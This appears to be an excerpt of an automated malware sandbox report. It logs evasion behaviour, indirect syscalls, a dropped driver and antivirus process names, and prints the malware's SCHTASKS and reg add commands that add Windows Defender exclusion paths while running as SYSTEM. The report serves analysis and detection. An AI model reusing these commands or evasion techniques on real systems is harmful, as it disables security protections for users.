Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010DD482 rdtsc 51_2_010DD482
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: EnumServicesStatusA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,SetLastError,52_2_00401DAB
Source: C:\Users\user\Documents\9afrYB.exeWindow / User API: threadDelayed 6853Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeWindow / User API: threadDelayed 3059Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeWindow / User API: threadDelayed 1893Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeWindow / User API: threadDelayed 5949Jump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_52-110346
Source: C:\Users\user\Documents\9afrYB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-14104
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_40-3223
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_41-3223
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_48-3244
Source: C:\Users\user\Documents\9afrYB.exeAPI coverage: 2.7 %
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeAPI coverage: 2.4 %
Source: C:\Users\user\Documents\9afrYB.exe TID: 4028Thread sleep count: 6853 > 30Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exe TID: 4028Thread sleep time: -13706000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\9afrYB.exe TID: 2180Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\9afrYB.exe TID: 2180Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\9afrYB.exe TID: 4028Thread sleep count: 3059 > 30Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exe TID: 4028Thread sleep time: -6118000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 4068Thread sleep count: 32 > 30Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 4068Thread sleep time: -480000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3868Thread sleep time: -45000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3556Thread sleep count: 43 > 30Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3556Thread sleep time: -1290000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3448Thread sleep count: 1893 > 30Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3448Thread sleep time: -1893000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 4828Thread sleep time: -42000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3448Thread sleep count: 5949 > 30Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exe TID: 3448Thread sleep time: -5949000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeLast function: Thread delayed
Source: C:\Users\user\Documents\9afrYB.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\ProgramData\kfbe6yYK.exeLast function: Thread delayed
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB8A1B8 FindFirstFileExW,3_2_00007FF8BFB8A1B8
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose,52_2_004A1C80
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,52_2_004A04A0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose,52_2_00408EFE
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00408E80 __EH_prolog,FindFirstFileA,FindClose,52_2_00408E80
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,52_2_00409040
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,52_2_0040935F
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,52_2_004C5A33
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040E79C __EH_prolog,FindFirstFileA,FindClose,52_2_0040E79C
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004CA859 FindFirstFileA,FindClose,52_2_004CA859
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,52_2_0040E965
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,52_2_004469AF
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA,52_2_004D2C75
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,52_2_004472CA
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError,52_2_004A73D0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00427512 __EH_prolog,FindFirstFileA,FindClose,52_2_00427512
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00425624 __EH_prolog,GetLogicalDriveStringsA,52_2_00425624
Source: C:\Users\user\Documents\9afrYB.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeAPI call chain: ExitProcess graph end nodegraph_3-14448
Source: C:\Users\user\Documents\9afrYB.exeAPI call chain: ExitProcess graph end nodegraph_3-14105
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010DD482 rdtsc 51_2_010DD482
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400073E0 LdrLoadDll,3_2_00000001400073E0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0000000140007C91
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_000000014000F000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD00CD mov eax, dword ptr fs:[00000030h]39_3_02BD00CD
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD00CD mov eax, dword ptr fs:[00000030h]39_3_02BD00CD
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD0643 mov eax, dword ptr fs:[00000030h]39_3_02BD0643
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD0643 mov eax, dword ptr fs:[00000030h]39_3_02BD0643
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD00CD mov eax, dword ptr fs:[00000030h]39_3_02BD00CD
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD00CD mov eax, dword ptr fs:[00000030h]39_3_02BD00CD
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD0643 mov eax, dword ptr fs:[00000030h]39_3_02BD0643
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 39_3_02BD0643 mov eax, dword ptr fs:[00000030h]39_3_02BD0643
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100A98F mov eax, dword ptr fs:[00000030h]51_2_0100A98F
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010069BF mov eax, dword ptr fs:[00000030h]51_2_010069BF
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,3_2_0000000140004630
Source: C:\Users\user\Documents\9afrYB.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0000000140007C91
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001400106B0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400092E0 SetUnhandledExceptionFilter,3_2_00000001400092E0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB81F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF8BFB81F50
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB876E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8BFB876E0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB82630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF8BFB82630
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 40_2_00332AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00332AE2
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 40_2_003310CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_003310CC
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 40_2_003351FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_003351FB
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: 41_2_00302AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_00302AE2
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: 41_2_003010CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_003010CC
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: 41_2_003051FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_003051FB
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: 48_2_009210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_009210CC
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: 48_2_00922AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00922AE2
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: 48_2_009251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_009251FB
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004B6DA7 SetUnhandledExceptionFilter,52_2_004B6DA7
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004B6DB9 SetUnhandledExceptionFilter,52_2_004B6DB9

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\9afrYB.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeNtDelayExecution: Indirect: 0x1994D5Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeNtProtectVirtualMemory: Indirect: 0x2A6B253Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeNtProtectVirtualMemory: Indirect: 0x2B5B253Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeNtProtectVirtualMemory: Indirect: 0x29FB253Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe" Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\5phaM8\5phaM8.exe "C:\Program Files (x86)\5phaM8\5phaM8.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0041E7C9 GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetLastError,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,52_2_0041E7C9
Source: 9eYJWFQF.exe, 9eYJWFQF.exe, 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: Shell_TrayWnd
Source: 9eYJWFQF.exe, 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: N.?AVCMenu@@TrayClockWClassTrayNotifyWndShell_TrayWnd|
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB8FD40 cpuid 3_2_00007FF8BFB8FD40
Source: C:\Users\user\Documents\9afrYB.exeCode function: GetLocaleInfoA,3_2_000000014000F370
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: GetLocaleInfoA,40_2_00336B1A
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: GetLocaleInfoA,41_2_00306B1A
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: GetLocaleInfoA,48_2_00926B1A
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,52_2_004BE0FA
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,52_2_004C2085
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: __EH_prolog,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,52_2_004020A1
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoA,MultiByteToWideChar,52_2_004C2142
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,52_2_004C2198
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoW,WideCharToMultiByte,52_2_004C225B
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: EnumSystemLocalesA,52_2_004BE2CF
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: EnumSystemLocalesA,52_2_004BE55A
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: EnumSystemLocalesA,52_2_004BE66D
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: GetLocaleInfoA,52_2_004BE861
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000000014000A370
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00405A7F GetUserNameA,52_2_00405A7F
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004B967E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,52_2_004B967E
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_0000000140005A70
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: 9afrYB.exe, 00000003.00000002.2358566414.0000000002838000.00000002.00001000.00020000.00000000.sdmp, 9afrYB.exe, 00000004.00000002.2374484716.0000000002928000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
